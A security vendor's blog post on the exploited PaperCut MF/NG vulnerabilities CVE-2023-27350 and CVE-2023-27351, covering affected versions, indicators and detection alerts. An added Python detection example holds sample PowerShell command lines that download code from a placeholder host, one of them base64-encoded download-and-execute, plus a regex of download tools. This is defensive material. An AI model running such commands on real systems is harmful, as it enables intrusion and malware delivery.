by Anish Bogati & Rabindra Dev Bhatta, Security Research – Updated May 8th 2023

PaperCut is a popular print management software used by thousands of organizations worldwide that helps make printing easier and more secure. Recent reports have revealed a critical vulnerability, CVE-2023-27350 with a CVSS score of 9.8, in the software that is being actively exploited by threat actors such as Lace Tempest and LockBit affiliates to deploy ransomware. The vulnerability allows attackers to remotely execute arbitrary code (RCE) on vulnerable systems, potentially giving them access to sensitive data and compromising the security of entire networks. Additionally, a high-severity vulnerability, CVE-2023-27351 with a CVSS score of 8.2, was reported in the PaperCut products. Both of these vulnerabilities were exploited by chaining them with an authentication bypass vulnerability.

Here, we’ll explore the details of the PaperCut vulnerability, its impact on organizations, and the steps you can take to protect your systems from this attack.


According to PaperCut, Trend Micro reported two vulnerabilities in the PaperCut MF & NG products, of which CVE-2023-27350 is being actively exploited in the wild. On April 18th, 2023, a PaperCut customer reported strange behavior in their system which possibly pointed toward the use of CVE-2023-27350 to attack unpatched systems. Based on PaperCut's analysis, the earliest instance connected to CVE-2023-27350 began on April 14th, 2023.

Important: According to PaperCut’s recent release, both of the vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9 and later.

Affected Versions

The following PaperCut MF / NG versions and components are affected by the vulnerabilities:

CVE-2023-27350

Unpatched PaperCut MF or NG version 8.0 or later on all OS platforms. This includes:

  • version 8.0.0 to 19.2.7 (inclusive)

  • version 20.0.0 to 20.1.6 (inclusive)

  • version 21.0.0 to 21.2.10 (inclusive)

  • version 22.0.0 to 22.0.8 (inclusive)

Application & Site servers are impacted.

CVE-2023-27351

Unpatched PaperCut MF or NG version 15.0 or later on all OS platforms. This includes:

  • version 15.0.0 to 19.2.7 (inclusive)

  • version 20.0.0 to 20.1.6 (inclusive)

  • version 21.0.0 to 21.2.10 (inclusive)

  • version 22.0.0 to 22.0.8 (inclusive)

Application servers are impacted.

About the Vulnerabilities: How Bad Are These?

The exploitation relies on an authentication bypass that exposes the PaperCut Application Server's administrative user to additional risk. Once authentication has been bypassed, threat actors can execute arbitrary code on the server through the “NT AUTHORITY\SYSTEM” account. A proof of concept has been made publicly available by Horizon3.ai.

  • CVE-2023-27350 (Remote Code Execution vulnerability)

Also tracked as ZDI-CAN-18987, the vulnerability allows an adversary to obtain Remote Code Execution (RCE) on a PaperCut Application Server without even needing to log into the system. Evidence pointing to its active exploitation has been found.

CVE             CVSSv3 Score   Severity
CVE-2023-27350  9.8            Critical

  • CVE-2023-27351 (User account data vulnerability)

Tracked as ZDI-CAN-19226, the vulnerability enables an adversary to potentially access user data saved in PaperCut MF or NG, including usernames, actual names, email addresses, office/department information, and any card numbers linked to the user. Additionally, the attacker gains access to hashed passwords for internally created PaperCut users; password hashes for users synced from directory sources such as Microsoft 365, Google Workspace, Active Directory, and others are not included. This too is accomplished without the need to log into the system. No evidence is currently available showing its exploitation on any customer's end.

CVE             CVSSv3 Score   Severity
CVE-2023-27351  8.2            High

In the wild

To date, there have been multiple instances where CVE-2023-27350 has been actively exploited by threat actors as a means to plant malware on the target system.

Detection of PaperCut Exploitation & Post-Exploitation with Logpoint

Patching an organizational infrastructure takes time, and therefore, it is important to look for indicators of attack and detect any traces of exploitation attempts or intrusion.

With a few queries, Logpoint Converged SIEM can be the tool in your arsenal for this task.

Required Log Sources

  1. Windows

    1. Process Creation with Command Line Auditing explicitly enabled

    2. Script Block Logging explicitly enabled

  2. Windows Sysmon

  3. Firewall

  4. IDS/IPS

Vulnerabilities in PaperCut MF / NG were detected in January, and adversaries have been found exploiting them since April. Therefore, it is crucial to set the search time range to start from January when utilizing the following queries and alerts.

Threat actors exploited the vulnerabilities and spawned either a PowerShell or a Command Prompt process from the PaperCut process (pc-app.exe) to perform their malicious actions.

Additionally, adversaries can leverage the aforementioned vulnerability to spawn Java processes and execute malicious code. VulnCheck has also provided a new POC where ftp.exe was spawned to execute arbitrary commands.

Also, adversaries can devise other methods to evade detection, so it is necessary to monitor for any process spawned by PaperCut, not only the ones listed above.

Huntress has observed adversaries spawn Command Prompt through PaperCut and execute PowerShell commands to download the payload.

The execution of the above command can be detected using the alert “Usage of Web Request Command”.

*Note: For the above alert to be triggered, the Script Block Logging module should be explicitly enabled.

If it is not enabled, the below query can be used as an alternative. Note, however, that this query will not be able to detect encoded commands.

The hash of the downloaded file is, f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb

The presence of the file related to the hash can be detected using the below query:

In another exploitation attempt, Huntress observed the usage of the following command to drop the payload in the system.

The alert “Usage of Web Request Command” can be utilized to detect such events. We can also detect the execution of such encoded payloads using the “Suspicious Encoded PowerShell Command Line” alert.
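As an added example (not from the original post and not Logpoint's own queries), the following Python applies the three detections described above, children of pc-app.exe, web request commands, and encoded PowerShell command lines, to constructed Sysmon Event ID 1 style records. It also decodes a -EncodedCommand payload and re-runs the web request check on it, which is exactly what a plain command-line query misses when Script Block Logging is off; the file paths, hostnames and URLs are placeholders.

```python
import base64
import re

# Constructed Sysmon Event ID 1 style records (not from the original post).
# The payload host "placeholder.example" is a placeholder, not a real IoC.
EVENTS = [
    {"ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c powershell -c "Invoke-WebRequest http://placeholder.example/setup.msi '
                    '-OutFile C:\\Windows\\Temp\\setup.msi"'},
    {"ParentImage": r"C:\Program Files\PaperCut MF\server\bin\win\pc-app.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.example/a')"
         .encode("utf-16-le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe",           # benign: not a PaperCut child
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Download primitives commonly seen in PowerShell/cmd one-liners.
WEB_REQUEST = re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|"
                         r"DownloadFile|Net\.WebClient|\bcurl\b|\bwget\b|bitsadmin", re.I)
# -e / -ec / -en / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind a -EncodedCommand argument, or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(event):
    """Return the list of alert names a single process-creation event raises."""
    alerts = []
    if event["ParentImage"].lower().endswith("\\pc-app.exe"):
        alerts.append("Suspicious Child Process of PaperCut")
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        alerts.append("Suspicious Encoded PowerShell Command Line")
    # Check the raw line and the decoded script: the download hidden in -enc
    # is only visible after decoding (or via Script Block Logging).
    if WEB_REQUEST.search(event["CommandLine"]) or (decoded and WEB_REQUEST.search(decoded)):
        alerts.append("Usage of Web Request Command")
    return alerts

def triage(events):
    """Pair each event's image name with the alerts it triggers."""
    return [(e["Image"].rsplit("\\", 1)[-1], analyse(e)) for e in events]
```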

Security vendors have observed communication to various domains mentioned in the below query to download the payload:

After exploiting the vulnerability, the payload was downloaded from the IP address 5.188.206.14.

If Suricata has been set up to use Emerging Threats rules, the below query can be utilized to detect communication to the C2 server.

After the payload was dropped into the system, adversaries utilized msiexec to execute the installation package.

The below query can be utilized to detect the installation of the payload:

As observed by Microsoft, Lace Tempest utilized WMIC to move laterally. A sample command is provided below:

Commands for lateral movement using WMIC can be detected using our alert “Suspicious WMI Execution Detected”.

Also, adversaries have exfiltrated data to Mega cloud storage, so the “Network Connection to Suspicious Server” alert can be utilized to detect network communication to Mega.io and other similar online services.

Incident response with Logpoint SOAR and AgentX

Logpoint Converged SIEM just got even better with the integration of AgentX! This native endpoint agent not only allows for the detection, investigation, and response to security incidents in the endpoints but also enables faster threat detection through Logpoint SOAR. As AgentX comes with built-in telemetry enrichment of SIEM+SOAR events and adds further context through MITRE TTPs, it provides SOC teams with actionable threat and operational information, reducing the time to respond to an incident.


The “Malicious File Investigation and Containment” playbook can be used to query files in threat intelligence platforms to check the legitimacy of the file and provide an automatic response.

Malicious File Investigation and Containment Playbook

By exploiting CVE-2023-27351, adversaries can retrieve credentials from the PaperCut Server. In case users have reused the same credentials elsewhere, the “Disable AD User” playbook can be used to disable that particular user.

Disable AD User Playbook

After detecting the IOC on a host, an analyst or administrator can utilize the “Logpoint AgentX Isolate-Unisolate Host” playbook to isolate the host from the network.

Isolate Host Playbook

Final Words: Apply the Patch Without Delay

According to PaperCut’s recent release, both of the vulnerabilities have been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9 and later. Therefore, upgrading your PaperCut Application Servers to one of the fixed versions is the optimal way to go.

Even after patching, you can stay on the safe side by conducting a quick scan of your systems for traces of infection with the detection queries provided in this blog.